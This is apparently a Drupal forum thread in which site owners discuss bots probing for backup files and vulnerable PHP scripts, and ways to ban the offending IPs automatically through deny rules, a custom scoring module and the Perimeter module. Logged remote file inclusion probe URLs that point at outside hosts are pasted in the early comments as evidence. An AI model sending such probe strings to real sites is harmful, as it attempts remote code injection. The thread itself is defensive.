Come together with the global Drupal community in Rotterdam, 28 Sept – 1 Oct 2026. Sessions, contribution, connection, and Early Bird savings until 8 June.
By hedac on
I have a lot of requests from different IP from China with requests of random files of rar extension.
in the log I see page not found errors of mirserver.rar, www.rar, backup.rar,... and so on... I don't have rars in my site. but I would like to ban automatically those ips trying to get rars from my site which are consuming my resources.. Is there a sway to do this? Thanks
Comments
new entry page not found:
new entry page not found: admin/Databackup/NewCloud_Backup.MDB
what is that? lol
it is clear I have tons of spy bots
bots are using many many
bots are using many many different IP from Korea. China... USA... ..... and they try to exploit some things..... drupal is secure and doesn't give them anything but a page not found... but... I hate having them around... they eat bandwidth and memory....
new entries:
playlist.php/db.php?commonpath=http://6l0zt.com/technote7/data/group/id.txt??
common/db.php?commonpath=http://www.sec-ir.com/administrator/components/com_joomla-visites/core/m...????
new requests... searching for
new requests... searching for vulnerabilities I guess...
/content/errors.php?error=http://mixcom.ru/pic/main.jpg???
/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/bocah_ajaib20/id.txt%0D??
they are all different ip
not only one bot... hundreds of them... or one bot using a lot of proxies
how could we ban ip for some
how could we ban ip for some days automatically if it requests a page like errors.php... ?
keep having attacks..... this
keep having attacks.....
this is my current list of banned hosts
deny host 210.183.36.% edit delete
deny host 65.254.41.% edit delete
deny host 220.135.110.% edit delete
deny host 66.36.164.% edit delete
deny host 124.139.67.% edit delete
deny host 202.71.213.% edit delete
deny host 212.113.48.% edit delete
deny host 93.157.3.% edit delete
deny host 194.144.60.% edit delete
deny host 58.227.193.% edit delete
deny host 67.15.48.% edit delete
deny host 92.115.212.% edit delete
deny host 63.247.141.% edit delete
deny host 81.176.78.% edit delete
deny host 78.40.226.% edit delete
deny host 212.95.58.% edit delete
deny host 201.212.1.% edit delete
deny host 65.98.123.% edit delete
deny host 74.6.18.242 edit delete
deny host 72.30.79.32 edit delete
deny host 58.226.94.% edit delete
deny host 84.21.71.% edit delete
deny host 218.234.18.% edit delete
this one is very rare from
this one is very rare
from Hostname 208.99.199.20
misc/);G(7.V.18==
misc/)))1e(-d.2e,-d.2c);G(42
misc/,M),D.2a(a,
misc/,c);G(40)d.9Q(f,
and more like that...
of course... another ip to the block Deny list.
question and info
Is there a character that would ban a range of ip addresses in the mask box[access rules] or somewhere else?
would like to ban/deny the following range: 208.99.192.0 - 208.99.223.255
fwiwd; for what its worth dept;
http://tools.whois.net/index.php?fuseaction=whois.whoisbyipresults
http://news.cnet.com/Alleged-Seattle-Spammer-arrested/2100-7348_3-618775...
I don't think so. % is all.
I don't think so. % is all. but not between 192 and 223.
Banning IP range
I get this same spammer hammering away at my site...
You can block IP range: 208.99.192.0 - 208.99.223.255 in Home › Administer › User management › Access rules with:
Deny:
208.99.19_.%
208.99.220.%
208.99.221.%
208.99.222.%
208.99.223.%
Allow:
208.99.190.%
208.99.191.%
I would like to ask if is
I would like to ask if is there a way to automatically BAN or add the IP to the Deny hosts list if they try to reach a specific page for example "content/common/db.php"
This one is tricky. On what
This one is tricky. On what to consider "banneable" and if it is realy worth it, in terms of processing time needed to identify these attacks and in terms of possible "false bans" (a www site is supposed to be a pulic place).
I can't mention a Drupal project for this.
At the webserver level, protecting against IPs used to "scan" a site sounds good. I can think on looking for IPs being present many times in /var/logs. There is a risk of banning a legitimate spider, such as Google.
Similarly, you could look for a certain "phrase" in that file, no matter if it's repeated or not. This is what you asked for (the phrase would be the path you would want).
For starters, take a look at Banning Bad Bots: A Short But Effective Script (not a Drupal specific solution).
Hope that helps. Saludos!
then there's always...
http://drupal.org/project/badbehavior - not quite what the OP is asking about, but should help a bit.
~silverwing
thanks. very interesting...
thanks. very interesting... maybe is what I'm looking for.
Gracias :) I have searched
Gracias :)
I have searched info for the IP's and none of them are google or any good bot. All of them are in some unknown host providers or without info. And also. google bot should not request pages with all those suspicious parameters.
I think that rewrite solution is very good
De nada
Just a further comment: When I said "There is a risk of banning a legitimate spider, such as Google.", I should have said "there is a risk of banning a legitimate IP, such as Google's or any other IP."
With public non-fixed IPs being used by these suckers, and if you use an automatic solution, you might be banning ANYONE on the Internet from seeying your site.
The impact of this can be negligible (20-100 users out of millions?), but that IP can be used by anyone on the net. It's just a balance between living with those extra request handled by the server (and keeping everything patched, which is a must) or loosing (even though it's just a bit) of your visibility. You and I can afford losing those potential readers. The New York Times or a high-trafic site might not.
A different but related issue would be a DoS attack. Those are punctual in time, but another PITA!
Adding IP to blocked list with rules
That would be helpful if IPs can automatically be banned after some hacking behaviour.
For example if som visitor tries to connect to this URL
example.com/wp-login.phpit's possibly a hacker attack.
Most of the time I check logs manually and ban that IPs.
It would be helpful to ban them if they try to visit some admin content.
Agreed
Agreed - this would be very helpful
Perhaps Honeypot Module should have some rules integration?
So far, this is what I have
So far, this is what I have created in a custom module, and it seems to work really nice.
A custom page, that is set to respond for 403 and 404 pages. There, I check what url is requested and for each "special" case I add points. For example, now, I check for /devel (for page like /node/*/devel/token) and /node/add. For these two examples, I add 20 points for the first case 10 for the second one, and one point for whatever other page gave "access denied". 20 because it is highly bot-related and 10 because it is a more classic "url" that somebody may accidentally go. Anyway, for each url request I add points and save it in a local txt file, per ip. A) Didn't use database to save the info, so as to avoid this kind of overhead and B) didn't use session as bots don't seem to keep cookies.
After each request, If there is a threshold (I put 15) then A) IP is banned and B) is user is logged in is deleted at once.
Finally, a cron that checks the txt files and restores IPs (unban) after two days (and deletes the equivalent txt files), so as to keep the database automatically cleaned up.
--
http://1024.gr - Programming by nature
Hi xaris.tsimpouris
Hi xaris.tsimpouris
I like your idea a lot. Any chance you could share your module's code.
Thanks
Nice idea! But note that
Nice idea! But note that creating text files will be much more overhead than using your database. You would be better off creating a DB based solution.
But this would be a good module idea.
Contact me to contract me for D7 -> D10/11 migrations.
Can you share your code,
Can you share your code, please ?
Thanks in advance
D8
For Drupal 8, the Drupal Perimeter Defence module does exactly this:
https://www.drupal.org/project/perimeter
It seems to be a really simple module; whenever Drupal cannot resolve a requested path, it emits a NotFoundHttpException event. The module intercepts the event, compares the requested path against a list of forbidden requests and if it matches, asks Drupal to ban the IP using the core Ban module.
I have made a D7 version of
I have made a D7 version of Perimeter, discussed here: https://www.drupal.org/project/perimeter/issues/3062229